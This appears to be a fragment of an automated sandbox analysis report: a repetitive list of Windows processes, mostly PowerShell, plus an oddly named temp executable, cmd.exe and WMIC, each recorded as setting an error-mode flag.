Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
